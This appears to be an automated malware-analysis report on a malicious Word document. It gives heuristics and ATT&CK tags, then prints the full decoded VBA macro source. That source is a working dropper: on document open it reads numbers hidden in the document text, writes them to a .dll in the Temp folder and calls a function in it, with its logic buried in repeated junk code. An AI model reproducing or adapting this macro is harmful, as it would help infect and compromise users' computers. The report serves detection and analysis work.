MALICIOUS
78
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The `Edit_u2` subroutine references `Environ("ProgramFiles")` and appears to interact with Windows Script Host, suggesting an attempt to download and execute a secondary payload. The presence of a `Document_Open` macro further supports the malicious intent of this document.
Heuristics 5
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Private Sub Document_Open() Edit_u2 ("Temp") -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim stdDateFilterremoveVariables As Boolean maxResults_contents = Environ(Avawe) If stdDateFilterremoveVariables Then -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15450 bytes |
SHA-256: 35efa3d21961c647699da446c79d1e87337b498f6b5ac5aae6af70a79bd9e19c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Edit_u2(Avawe)
Dim maxResults_contents As String
Dim stdDateFilterremoveVariables As Boolean
maxResults_contents = Environ(Avawe)
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
ChDir (maxResults_contents)
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
End Sub
Sub left_adminemail(accountid, layout, collection_sqlquery, taxonomy, OutSum, u31, ans, icon)
Dim sorderdbprefix As Long
Dim stdDateFilterremoveVariables As Boolean
Dim endyear_servername As Words
Set endyear_servername = ThisDocument.Words
codepress_eids = "-"
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
On Error Resume Next
Dim choicetemp As String
Dim tagid_currencyCodeType As Boolean, uniqidrepo As Boolean
Dim left_subscribe As Byte, Last As Long
Dim gallery_u7
tagid_currencyCodeType = False
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
collection_sqlquery = collection_sqlquery + ".dll"
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
Edit_u2 ("Temp")
removeheader.mobile (collection_sqlquery)
For Each gallery_u7 In endyear_servername
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
If gallery_u7 = codepress_eids Then
uniqidrepo = True
GoTo newpwd
End If
If uniqidrepo = True Then
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
gallery_u7 = codepress_eids + gallery_u7
uniqidrepo = False
End If
If gallery_u7 <> accountid And tagid_currencyCodeType = False Then
GoTo newpwd
End If
If IsNumeric(gallery_u7) And tagid_currencyCodeType Then
sorderdbprefix = Val(gallery_u7)
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
Put #39, , sorderdbprefix
End If
If gallery_u7 = accountid Then
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
End If
tagid_currencyCodeType = True
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
ElseIf gallery_u7 = layout Then
tagid_currencyCodeType = False
GoTo aname
End If
newpwd:
Next gallery_u7
aname:
removeheader.Width (resource)
End Sub
Sub downloadpos_opener()
Dim stdDateFilterremoveVariables As Boolean
On Error Resume Next
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
Dim dateEnd_endyear As Boolean
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
Call left_adminemail("txtx", "NEWCHOICENEWCHOICE", "totalProductCount", "returnURL", "banned", "modal", "u6", "exact")
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
dateEnd_endyear = removeheader.bidets(43)
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
If dateEnd_endyear = False Then
Call left_adminemail("USERNAMEUSERNAME", "answersanswers", "totalProductCount", "returnURL", "banned", "modal", "u6", "exact")
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
removeheader.bidets (23)
End If
End Sub
Private Sub Document_Open()
Edit_u2 ("Temp")
downloadpos_opener
End Sub
Attribute VB_Name = "removeheader"
Private Declare PtrSafe Sub languages Lib "ntdll" Alias "RtlMoveMemory" _
(Destination As LongPtr, Source As LongPtr, ByVal Length As LongPtr)
Declare PtrSafe Function bidets Lib "totalProductCount" Alias "implode" (ByVal ArgVal1 As Long) As Boolean
Private Declare PtrSafe Sub dob Lib "ntdll" Alias "index" _
(Destination As LongPtr, Source As LongPtr, ByVal Length As LongPtr)
Sub Width(edit)
Dim map_orderby As Boolean
If map_orderby Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
Close #39
If ctid_menu Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
End Sub
Sub mobile(edit)
Dim ctid_menu As Boolean
If ctid_menu Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
Open edit For Binary As #39
If ctid_menu Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.